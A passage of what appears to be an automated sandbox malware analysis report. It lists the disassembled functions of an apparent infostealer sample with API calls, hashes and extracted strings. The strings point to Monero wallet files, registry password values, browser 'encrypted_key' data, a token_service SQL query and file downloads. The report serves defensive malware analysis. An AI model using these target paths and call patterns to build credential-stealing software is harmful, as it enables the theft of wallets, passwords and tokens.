                        • Opcode ID: 0127f2a659e9a8c2100aca057052b107259e22d523fb5a259b778d5d5084ed55
                        • Instruction ID: 47b90208be3a2556591b4c81c25600c55bd996a133983f37c0c288c40f03107a
                        • Opcode Fuzzy Hash: 0127f2a659e9a8c2100aca057052b107259e22d523fb5a259b778d5d5084ed55
                        • Instruction Fuzzy Hash: 0B511E34911148DBCB18FF60DD92AED7779AF50321F504028F4065B5D1EF396B86EB62
                        Function 00F112D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: e8cccb3beaaca20ec4395b8f56853ab8f931e4fc56dc1f1c270783510420a82c
                        • Instruction ID: d1156d86737cf09de3c43019538894e8a343e3f17e37f176f6dcccab51559771
                        • Opcode Fuzzy Hash: e8cccb3beaaca20ec4395b8f56853ab8f931e4fc56dc1f1c270783510420a82c
                        • Instruction Fuzzy Hash: F7C1E8B59412089BCB18EF60DD89FEE7378BF64300F004598F51A67281EB78AAC5DF91
                        Function 00F14280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F18DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F18E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00F142EC
                        • lstrcat.KERNEL32(?,008AED50), ref: 00F1430B
                        • lstrcat.KERNEL32(?,?), ref: 00F1431F
                        • lstrcat.KERNEL32(?,008AD6B0), ref: 00F14333
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F18D90: GetFileAttributesA.KERNEL32(00000000,?,00F01B54,?,?,00F2564C,?,?,00F20E1F), ref: 00F18D9F
                          • Part of subcall function 00F09CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00F09D39
                          • Part of subcall function 00F099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F099EC
                          • Part of subcall function 00F099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F09A11
                          • Part of subcall function 00F099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00F09A31
                          • Part of subcall function 00F099C0: ReadFile.KERNEL32(000000FF,?,00000000,00F0148F,00000000), ref: 00F09A5A
                          • Part of subcall function 00F099C0: LocalFree.KERNEL32(00F0148F), ref: 00F09A90
                          • Part of subcall function 00F099C0: CloseHandle.KERNEL32(000000FF), ref: 00F09A9A
                          • Part of subcall function 00F193C0: GlobalAlloc.KERNEL32(00000000,00F143DD,00F143DD), ref: 00F193D3
                        • StrStrA.SHLWAPI(?,008AED38), ref: 00F143F3
                        • GlobalFree.KERNEL32(?), ref: 00F14512
                          • Part of subcall function 00F09AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F04EEE,00000000,00000000), ref: 00F09AEF
                          • Part of subcall function 00F09AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00F04EEE,00000000,?), ref: 00F09B01
                          • Part of subcall function 00F09AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F04EEE,00000000,00000000), ref: 00F09B2A
                          • Part of subcall function 00F09AC0: LocalFree.KERNEL32(?,?,?,?,00F04EEE,00000000,?), ref: 00F09B3F
                        • lstrcat.KERNEL32(?,00000000), ref: 00F144A3
                        • StrCmpCA.SHLWAPI(?,00F208D1), ref: 00F144C0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00F144D2
                        • lstrcat.KERNEL32(00000000,?), ref: 00F144E5
                        • lstrcat.KERNEL32(00000000,00F20FB8), ref: 00F144F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                        • String ID:
                        • API String ID: 3541710228-0
                        • Opcode ID: 2605cd22e71f0475debc78da231a2b532cef11a50eecd07f46ae029bfe8b2594
                        • Instruction ID: eb1d96ab2fb9911645425cc297155792e221b3cc9e4b4ce34ab2b4cefc3d6de5
                        • Opcode Fuzzy Hash: 2605cd22e71f0475debc78da231a2b532cef11a50eecd07f46ae029bfe8b2594
                        • Instruction Fuzzy Hash: 2C7196B6D00208ABDB14EBE0EC85FEE7379AF88700F044598F61597181EA38DB85DF91
                        Function 00F01310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F012A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F012B4
                          • Part of subcall function 00F012A0: RtlAllocateHeap.NTDLL(00000000), ref: 00F012BB
                          • Part of subcall function 00F012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00F012D7
                          • Part of subcall function 00F012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00F012F5
                          • Part of subcall function 00F012A0: RegCloseKey.ADVAPI32(?), ref: 00F012FF
                        • lstrcat.KERNEL32(?,00000000), ref: 00F0134F
                        • lstrlen.KERNEL32(?), ref: 00F0135C
                        • lstrcat.KERNEL32(?,.keys), ref: 00F01377
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                          • Part of subcall function 00F18B60: GetSystemTime.KERNEL32(00F20E1A,008AAD30,00F205AE,?,?,00F013F9,?,0000001A,00F20E1A,00000000,?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F18B86
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00F01465
                          • Part of subcall function 00F1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F1A7E6
                          • Part of subcall function 00F099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F099EC
                          • Part of subcall function 00F099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F09A11
                          • Part of subcall function 00F099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00F09A31
                          • Part of subcall function 00F099C0: ReadFile.KERNEL32(000000FF,?,00000000,00F0148F,00000000), ref: 00F09A5A
                          • Part of subcall function 00F099C0: LocalFree.KERNEL32(00F0148F), ref: 00F09A90
                          • Part of subcall function 00F099C0: CloseHandle.KERNEL32(000000FF), ref: 00F09A9A
                        • DeleteFileA.KERNEL32(00000000), ref: 00F014EF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                        • API String ID: 3478931302-218353709
                        • Opcode ID: 47a089ae25808970b3b1b81c241073e3eba7dc5d8bdc1d344345bcfc57525040
                        • Instruction ID: 2726b6d0b945e6efca2fb1dec12d4001c173c5c71e6a7409677382549f218c3b
                        • Opcode Fuzzy Hash: 47a089ae25808970b3b1b81c241073e3eba7dc5d8bdc1d344345bcfc57525040
                        • Instruction Fuzzy Hash: E45155B1D5011897DB15FB60DD92FED733CAF54710F4041A8B60A620C1EE786BC6DBA6
                        Function 00F075D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00F0733A
                          • Part of subcall function 00F072D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00F073B1
                          • Part of subcall function 00F072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00F0740D
                          • Part of subcall function 00F072D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00F07452
                          • Part of subcall function 00F072D0: HeapFree.KERNEL32(00000000), ref: 00F07459
                        • lstrcat.KERNEL32(00000000,00F217FC), ref: 00F07606
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00F07648
                        • lstrcat.KERNEL32(00000000, : ), ref: 00F0765A
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00F0768F
                        • lstrcat.KERNEL32(00000000,00F21804), ref: 00F076A0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00F076D3
                        • lstrcat.KERNEL32(00000000,00F21808), ref: 00F076ED
                        • task.LIBCPMTD ref: 00F076FB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                        • String ID: :
                        • API String ID: 2677904052-3653984579
                        • Opcode ID: f05763f06c3088ef3d08e72595565d6e8bf32358213f08445ee9a3d48c32b706
                        • Instruction ID: 6b1f4d95dd5db24f2da215327fcfce95b106b6b7b88e5da6edbb4997f6c473b1
                        • Opcode Fuzzy Hash: f05763f06c3088ef3d08e72595565d6e8bf32358213f08445ee9a3d48c32b706
                        • Instruction Fuzzy Hash: 02314D7AD40209DBDB18EBE4EC95DEE7774FF48701B104128E117A7284DA38A986EB51
                        Function 00F060A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F1A7E6
                          • Part of subcall function 00F047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F04839
                          • Part of subcall function 00F047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F04849
                        • InternetOpenA.WININET(00F20DF7,00000001,00000000,00000000,00000000), ref: 00F0610F
                        • StrCmpCA.SHLWAPI(?,008AF278), ref: 00F06147
                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00F0618F
                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00F061B3
                        • InternetReadFile.WININET(?,?,00000400,?), ref: 00F061DC
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00F0620A
                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00F06249
                        • InternetCloseHandle.WININET(?), ref: 00F06253
                        • InternetCloseHandle.WININET(00000000), ref: 00F06260
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                        • String ID:
                        • API String ID: 2507841554-0
                        • Opcode ID: 5d8df85d2a575f95fbbaa135716ad41dbe0258950befaa7e1d6ab5010135de0f
                        • Instruction ID: f2c45a684e3852c1a1e8d870fa58e6afb38cf7ccd646ceb1072eeba851390f6c
                        • Opcode Fuzzy Hash: 5d8df85d2a575f95fbbaa135716ad41dbe0258950befaa7e1d6ab5010135de0f
                        • Instruction Fuzzy Hash: CA519FB1940218ABDF24DF60DD49BEE77B8EF04701F1080A8B606A71C0DB756AC9EF95
                        Function 00F072D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00F0733A
                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00F073B1
                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00F0740D
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00F07452
                        • HeapFree.KERNEL32(00000000), ref: 00F07459
                        • task.LIBCPMTD ref: 00F07555
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$EnumFreeOpenProcessValuetask
                        • String ID: Password
                        • API String ID: 775622407-3434357891
                        • Opcode ID: 48562bf62f22388ec75b80c10dbc4295eef80f2a51d42830a251ef5e7e68eabf
                        • Instruction ID: 5d1266f1fce0709cbb4a0fa27ebba44e1d6e4618e981554794bd66d3bb29f1c8
                        • Opcode Fuzzy Hash: 48562bf62f22388ec75b80c10dbc4295eef80f2a51d42830a251ef5e7e68eabf
                        • Instruction Fuzzy Hash: 2D612CB5D04268DBDB24DB50DC41BDAB7B8BF44340F0081E9E689A6181DFB46BC9EF90
                        Function 00F0BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                          • Part of subcall function 00F1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F1A7E6
                        • lstrlen.KERNEL32(00000000), ref: 00F0BC9F
                          • Part of subcall function 00F18E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F18E52
                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 00F0BCCD
                        • lstrlen.KERNEL32(00000000), ref: 00F0BDA5
                        • lstrlen.KERNEL32(00000000), ref: 00F0BDB9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                        • API String ID: 3073930149-1079375795
                        • Opcode ID: 68c53fd725c71a443f9ff1d5518e69a5008169e50c12cab59fb0697482602060
                        • Instruction ID: b418ed721b62f996658820a17542180a57de0845be32896941c3052d481b292e
                        • Opcode Fuzzy Hash: 68c53fd725c71a443f9ff1d5518e69a5008169e50c12cab59fb0697482602060
                        • Instruction Fuzzy Hash: 52B151719111089BDB14FBA0DD96EEE7339AF54320F404168F507A70D1EF396E89EBA2
                        Function 00F16770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess$DefaultLangUser
                        • String ID: *
                        • API String ID: 1494266314-163128923
                        • Opcode ID: 7ae449d69f8ab0adaf249a0abbf1066911f8fa41f7bb7456d04ecac18512fb3a
                        • Instruction ID: 46a9bb46e4c2414400565c90cd4760b860c0235a263dcde4065e2d10c139abc2
                        • Opcode Fuzzy Hash: 7ae449d69f8ab0adaf249a0abbf1066911f8fa41f7bb7456d04ecac18512fb3a
                        • Instruction Fuzzy Hash: 46F01734984209EBE368DFE0A5197687B74FB04B03F0501A8F61B87284DA714A819B95
                        Function 00F04FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00F04FCA
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F04FD1
